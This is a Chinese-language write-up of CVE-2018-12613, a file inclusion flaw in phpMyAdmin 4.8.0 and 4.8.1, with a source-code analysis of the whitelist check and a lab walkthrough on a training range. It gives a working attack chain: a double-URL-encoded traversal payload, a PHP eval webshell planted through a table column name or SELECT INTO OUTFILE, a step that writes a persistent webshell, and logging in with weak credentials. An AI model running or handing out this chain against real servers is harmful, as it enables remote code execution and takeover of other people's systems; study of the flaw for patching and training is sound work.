CVE-2018-12613总结
1.漏洞基础介绍
1.1漏洞背景
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。
ChaMd5安全团队披露了他们发现的一个phpMyAdmin文件包含漏洞,并且演示了如何将本地文件包含升级至远程命令执行。随后,phpmyadmin在最新版本修复了这个严重级别的漏洞。
1.2漏洞介绍
攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。
攻击者必须经过身份验证,但在这些情况下除外:
$ cfg ['AllowArbitraryServer'] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码;
$ cfg ['ServerDefault'] = 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码。
影响版本:phpMyAdmin 4.8.0和4.8.1
2.漏洞原理分析
有了上面的基础知识后,我们就可以进入本篇文章的重头环节——漏洞的原理分析。
2.1 源码分析
该漏洞在phpMyAdmin4.8.0和4.8.1中存在,这里以phpMyAdmin的4.8.1版本为例进行分析。首先我们要获取phpMyAdmin4.8.1的源码,当然没有源码也并不妨碍你读懂该篇文章,与漏洞相关的重要的代码都已经显示在文章中。将我们的源码使用seay(代码审计工具)打开。因为我们已经明确该漏洞是文件包含漏洞,所以直接在seay中全局搜索include关键字,发现代码中存在大量的include。但是大部分的include都是类似于下面这种
include 'libraries/db_common.inc.php';
将包含的文件名或者路径写死在程序中,也就是说用户无法控制包含的文件也就不存在文件包含漏洞。我们主要是寻找用户可以控制文件路径的include函数。本文讨论的漏洞出现index.php文件的在下面的代码中
include $_REQUEST['target'];
从代码中可以看出,他会从客户端接收数据,然后将数据指定的文件包含到程序中,显然我们可以控制包含的文件。这便是我们要执行的目标代码。
接着仔细查看该段代码出现的文件内容,查看如何能够触发文件包含,也就是说如何能够让程序执行到存在文件包含漏洞的代码。从目标代码往前查看,寻找die、exit这些能够导致退出脚本的语句。我们在代码中找到了如下的内容
if (! empty($_REQUEST['target'])
&& is_string($_REQUEST['target']) && ! preg_match('/^index/', $_REQUEST['target']) && ! in_array($_REQUEST['target'], $target_blacklist) && Core::checkPageValidity($_REQUEST['target'])) {
include $_REQUEST['target']; exit; }可以看到我们要执行的目标代码本身位于一个if判断中,该if判断中存在五个条件
|
条件编号 |
条件内容 |
|
条件1 |
!empty($_REQUEST[‘target’]) |
|
条件2 |
is_string($_REQUEST[‘target’]) |
|
条件3 |
!preg_match(’/^index/’, $_REQUEST[‘target’]) |
|
条件4 |
!in_array($_REQUEST[‘target’], $target_blacklist) |
|
条件5 |
Core::checkPageValidity($_REQUEST[‘target’]) |
必须要同时满足上面的5个条件才可以执行我们的目标代码。条件1表示来自客户端的传参的target字段值不可以为空;条件2表示target字段的值必须要是字符串;条件3表示target字段的值不可以以index开头。在条件4中出现了一个新的变量$target_blacklist,在条件5中有一个函数Core::checkPageValidity。接下来我们要研究这一个变量和一个函数。
根据该变量的命名可以推测,该变量应该是一个黑名单。在程序中找到了该变量的定义如下
$target_blacklist = array (
'import.php', 'export.php');
可以看到变量$target_blacklist是一个数组,里面存放的是两个文件名。也就是说该变量确实是一个黑名单,条件4是判断target的值是否在黑名单中,如果在黑名单中in_array函数就会为真,而!in_array也就为假。整个的if就会不成立,所以我们输入的target的内容不可以为import.php或者export.php。
弄清了变量的意思,接下来要看看函数
Core::checkPageValidity的作用,在程序中找到该函数的定义如下
class Core
{
//... public static function checkPageValidity(&$page, array $whitelist = []) { if (empty($whitelist)) { $whitelist = self::$goto_whitelist; } if (! isset($page) || !is_string($page)) { return false; } if (in_array($page, $whitelist)) { return true; } $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } $_page = urldecode($page); $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { return true; } return false; } //...}
该函数是Core类的一个静态方法。代码的作者在代码中对该函数的功能进行了描述,即该函数会根据白名单对target传参进行审查,如果target的值在名单中该函数就会返回true。其中白名单存放在$whitelist变量中。
接下来我们来仔细的分析一下该函数的处理逻辑。可以看到在该函数中存在5个if判断,分别是
|
判断编号 |
判断内容 |
|
判断1 |
if(empty($whitelist)) |
|
判断2 |
if(!isset($page)||! is_string($page)) |
|
判断3 |
if(in_array($page, $whitelist)) |
|
判断4 |
if(in_array($page, $whitelist)) |
|
判断5 |
if(in_array($page, $whitelist)) |
因为在函数中定义了如果$whitelist在传参的时候为缺省,就会直接置为空值。
public static function checkPageValidity(&$page, array $whitelist = [])
所以第一个if判断是在函数是对白名单进行初始化操作,原始的白名单内容存放在变量$goto_whitelist中,该变量的值为
public static $goto_whitelist = array(
'db_datadict.php', 'db_sql.php', 'db_events.php', //...... 'transformation_overview.php', 'transformation_wrapper.php', 'user_password.php', );在执行完第一个判断后,变量$whitelist中就存放了白名单的内容。判断1只是完成白名单的初始化操作,与我们传参的内容无关。接着看判断2,
if (! isset($page) || !is_string($page))
该判断是用来检测我们target字段的值是否不为空且类型为字符串。后面三个判断都是检测taget字段的值是否在白名单中,如果在白名单中该函数会返回true。
if (in_array($_page, $whitelist))但是关键点在于如果不在白名单中该函数并没有直接返回false,而是对target字段的值进行了处理然后再进行匹配。
判断3是直接判断target字段的值是否在白名单中,如果不在白名单中会执行下面的代码
$_page = mb_substr(
$page, 0, mb_strpos($page . '?', '?') );该段代码会截取传参之前的内容,比如我们传入的内容是index.php?id=1,经过该函数处理后会变成index.php。然后将截取到的文件名与白名单进行匹配,也就是判断4执行的内容。如果匹配成功返回true,匹配失败接着对target的值进行处理,会执行下面的代码
$_page = urldecode($page);
$_page = mb_substr(
$_page,
0, mb_strpos($_page . '?', '?') );该段代码会对target的值进行URL解码,然后对解码后的内容截取?传参之前的内容。在将截取到的内容与白名单进行匹配,也就是执行判断5的内容,这是最后一个判断。如果该判断成立会返回true。所有的判断都不成立就会返回false。
2.2 构造payload
2.2.1 设想一:target=db_sql.php?/…/
如果我们想成功执行
include $_REQUEST['target'];
必须要使我们的target传参同时满足以下5个条件
|
条件编号 |
条件内容 |
说明 |
|
条件1 |
!empty($_REQUEST[‘target’]) |
target的值不可以为空 |
|
条件2 |
is_string($_REQUEST[‘target’]) |
target的值的类型必须为字符串 |
|
条件3 |
!preg_match(’/^index/’, $_REQUEST[‘target’]) |
target的值不能以index开头 |
|
条件4 |
!in_array($_REQUEST[‘target’], $target_blacklist) |
target的值不能为import.php, export.php |
|
条件5 |
Core::checkPageValidity($_REQUEST[‘target’]) |
target的值必须能够成功匹配白名单 |
在条件5的函数中又存在5条判断
|
判断编号 |
判断内容 |
说明 |
|
判断1 |
if(empty($whitelist)) |
白名单不可以为空 |
|
判断2 |
if(!isset($page)||!is_string($page)) |
target的值不可以为空且类型为字符串 |
|
判断3 |
if(in_array($page, $whitelist)) |
将原生的target值与白名单进行匹配 |
|
判断4 |
if(in_array($page, $whitelist)) |
将去掉传参的targte的值与白名单进行匹配 |
|
判断5 |
if(in_array($page, $whitelist)) |
将URL解码并去掉传参的target的值域白名单进行匹配 |
前两条判断可以很顺利的通过,在第三条判断中不存在操作空间,因为他会直接将我们传参的内容与白名单进行匹配。在第四条判断中,我们可以构想如下的payload
target=db_sql.php?/../该payload表示的路径是当前工作目录,如果该payload可以在include中成功的被包含,那么我们就可以以当前目录为依据完成文件包含。其中db_sql.php是白名单中的文件,显然该target的值可以顺利的通过前4个条件,
! empty($_REQUEST['target'])
&& is_string($_REQUEST['target'])
&& ! preg_match('/^index/', $_REQUEST['target'])
&& ! in_array($_REQUEST['target'], $target_blacklist)
在执行第5个条件的时候
&& Core::checkPageValidity($_REQUEST['target'])
进入checkPageValidity函数函数中执行5个判断,
if(empty($whitelist))
if(!isset($page)||!is_string($page))
if(in_array($page, $whitelist))
if(in_array($page, $whitelist))
if(in_array($page, $whitelist))
判断1与我们输入的内容无关,判断2显然可以顺利通过,
if(empty($whitelist))
if(!isset($page)||!is_string($page))
在执行判断3与白名单进行匹配的时候会匹配失败,然后执行判断4,判断4会去除?之后的内容,target的值从db_sql.php?/…/变成了db_sql.php,与白名单匹配成功了,直接返回true,也就让五个条件都成立,
! empty($_REQUEST['target'])
&& is_string($_REQUEST['target'])
&& ! preg_match('/^index/', $_REQUEST['target'])
&& ! in_array($_REQUEST['target'], $target_blacklist)
&& Core::checkPageValidity($_REQUEST['target'])
然后执行我们的目标代码。
在执行checkPageValidity函数的时候并没有修改target的值,在对target的值进行处理后再匹配时,使用_page变量保存的处理的后的值,而没有直接修改target的值,所target的内容依据是我嗯输入的db_sql.php?/…/。但是include所使用的文件的路径中不可以包含特殊字符,而我们使用了?,所以依旧无法完成文件包含。
2.2.2 设想二:target=db_sql.php%253f/…/
虽然设想一没有完成文件包含。但是我们可以利用判断5中会进行URL解码来进行文件的包含。当我们使用GET进行传参的时候浏览器会对GET传递的数据进行URL编码,数据到达服务器后会进行URL解码。比如我们使用GET传递一个单引号(’),浏览器会将其编码为%27,然后传递给服务器端,服务器接收到数据后会进行URL解码,获得传递的值(’’)。但是如果我们手动在数据包中的将%27修改为%2527,那么服务器端接收到%2527的时候会进行一个URL解码,解码后变成了%27(%25是%的URL编码)。而站点的代码中又调用了urldecode函数对传参的内容进行URL解码,在第二次解码后,我们传递的内容变成了单引号(%27是单引号的URL编码)。也就是说客户端发送来的数据服务端进行了两次URL解码。
而我们这里的判断5中就调用urldecode函数。因此我们可以尝试构造下面的payload
target=db_sql.php%253f/../首先服务器接收到该传参后进行一次URL解码,变成
target=db_sql.php%3f/../该值可以顺利的通过前4个条件的判断,
! empty($_REQUEST['target'])
&& is_string($_REQUEST['target'])
&& ! preg_match('/^index/', $_REQUEST['target'])
&& ! in_array($_REQUEST['target'], $target_blacklist)
然后进入checkPageValidity函数,在执行判断3、4的时候均匹配失败(判断3匹配原声target的值,判断4匹配去掉传参后的target的值),于是执行判断5,在条件5中会对该值进行URL解码,变成了
target=db_sql.php?/../#%3f是?的URL编码
解码完成后,会去除去除传参,最终变成了
target=db_sql.php能够成功的匹配白名单。因此条件5也成立,
&& Core::checkPageValidity($_REQUEST['target'])
便能够执行目标代码
include $_REQUEST['target'];
虽然在checkPageValidity函数中对target的值进行了一系列处理,但是并没有影响到target真正的值,因为在使用处理后的target进行白名单匹配的时候,都是使用了一个新的变量接受target的值,而并没有直接影响target本来的值,所以target的值依旧为
target=db_sql.php?/../现在target值并没有携带include无法接受的特殊符号,因此该payload可以成功跳回当前目录,我们就可以在后面添加任意的路径来包含任意的文件。
3.漏洞利用
知道了站点存在文件包含漏洞,也明确了绕过过滤的办法,接下来要解决的就是如何利用该漏洞。也可以基本设想就是在站点上传一个木马文件,然后通过文件包含漏洞包含该文件,也就是登录执行了木马程序,我们也就可以成功的getshell。
有了上面的基本设想,便可以开始下面的操作了。首先这里是一个后台文件包含的漏洞,因此首先我们需要登录phpMyAdmin。在这里我们无法上传文件,但是我们可以利用MySQL的数据在站点写入木马。
首先要知道MySQL中存放的数据都是以文件的形式存放在服务器上的,我们可以在服务器上创建一个表,该表包含只有一个字段,而这个字段名就是一个木马程序
<?php @eval($_GET['cmd']);?>
或者是
<?php file_put_contents('1.php','<?php eval($_REQUEST[cmd])?>');?>
当我们将表的字段名设置为木马后,数据库会创建一个文件,文件中会包含该句代码,也就相当于我们在站点写入了一木马文件。这里使用第一个程序,创建一个表然后将表的字段名设置为木马
CREATE TABLE `test`.`wjbh` ( `<?php @eval($_GET['cmd']);?>` INT);
完成了木马文件的写入后,我们要使用该漏洞来包含我们的木马文件。首先我们将页面的URL修改为
http://ip/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../phpstudy/mysql/data/test/wjbh.frm&cmd=phpinfo();因为漏洞是出现在index.php文件中,我们对该文件进行传参
target=db_sql.php%253f/../../../../../../../../phpstudy/mysql/data/test/wjbh.frm&cmd=phpinfo()当index.php接收到target的传参的时候,会进行过滤。根据我们前面的分析,这里所使用的路径可以绕过站点的过滤,顺利的执行到include代码。当include包含该文件的时候会根据文件路径去寻找文件。这里的
db_sql.php%253f/..表示的就是当前的工作目录,然后不断的通过’…'跳到上一级目录,无论跳了多少次,最多也只会回到根目录,因此我们可以多跳几次确保进入根目录中,然后在加上木马文件的路径
phpstudy/mysql/data/test/wjbh.frm#该路径是存放我们之前创建的表的文件
当程序包含了我们的木马程序后,会执行我们的木马程序,我们在URL中又对木马程序进行了传参
cmd=phpinfo()木马程序会将我们传参的内容当作代码执行,因此我们访问该URL后页面会显示phpinfo的内容,显示如下
说明该木马可以成功的执行,但是要我们要执行该木马文件需要登录phpMyAdmin,登录的步骤会给我们的后续操作代码不变,我们希望可以直接访问木马文件。因此我们可以控制该木马写入一个新的木马文件,将URL修改为
http://ip/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../phpstudy/mysql/data/zgj/wjbh.frm&cmd= file_put_contents('8.php','<?php @eval($_REQUEST[cmd])?>');也就是想木马文件传参
file_put_contents('1.php','<?php @eval($_REQUEST[cmd])?>');
木马文件会执行我们传递的参数,然后会在站点的根目录下写入一个新的木马文件,我们可以通过下面的URL直接访问到该木马文件。
http://ip/phpmyadmin/1.php有了该木马文件后,我们可以使用菜刀或者其他工具链接该站点,直接拿下站点的服务器,为所欲为。
4.实战利用:
墨者学院 phpMyAdmin后台文件包含分析溯源
网址:https://www.mozhe.cn/bug/detail/264
我们进入靶场,并开启靶场,可以进行该题目
直接输入url,如图所示,219.153.49.228:40477,这样就可以进如该题目,进入后发现是一个phpmyadmin的后台登录界面
我们考虑使用弱口令进行登录(万能密码也可以),弱口令(常见的root,admin,test)
本题是root和root,进入后可以发现:
它的版本是4.8.1,符合CVE-2018-12613漏洞,所以我们直接考虑用2种方法进行做题
方法1,构造payload,直接做题,原理及介绍在上面都有
?target=db_sql.php%253f/../../../../key.txt
至于为什么是在index.php下构造,用%253f,而不是?,原因是
如图所示结果是:
方法2,使用sql语句,一句话木马,菜刀连接
我们在在上面一栏中的功能栏中,可以发现有一个sql,我们打开后可以发现:
我们构造sql语句,将一句话木马输入其中
select into 的意思是通过 SQL,您可以从一个表复制信息到另一个表。
SELECT INTO 语句从一个表复制数据,然后把数据插入到另一个新表中。
而outfile的意思是输出文件,我们输入后面的那个文件,1.php的意思是那个一句话木马,也就是<?php eval($_POST[giao]);?>
至于为什么是/var/www/html目录下,大家可以看一下我的linux的各个目录的介绍
我们可以直接用蚁剑进行连接,url是url/1.php,也就是如下图所示:
连接成功后,我们可以发现:
我们逐次查看各级目录,在根目录下可以发现一个key.txt的文件,所以我们打开这个key.txt的文件就是我们此题的答案
key.txt的内容如下,也就是本题的答案,直接输入即可完成此题
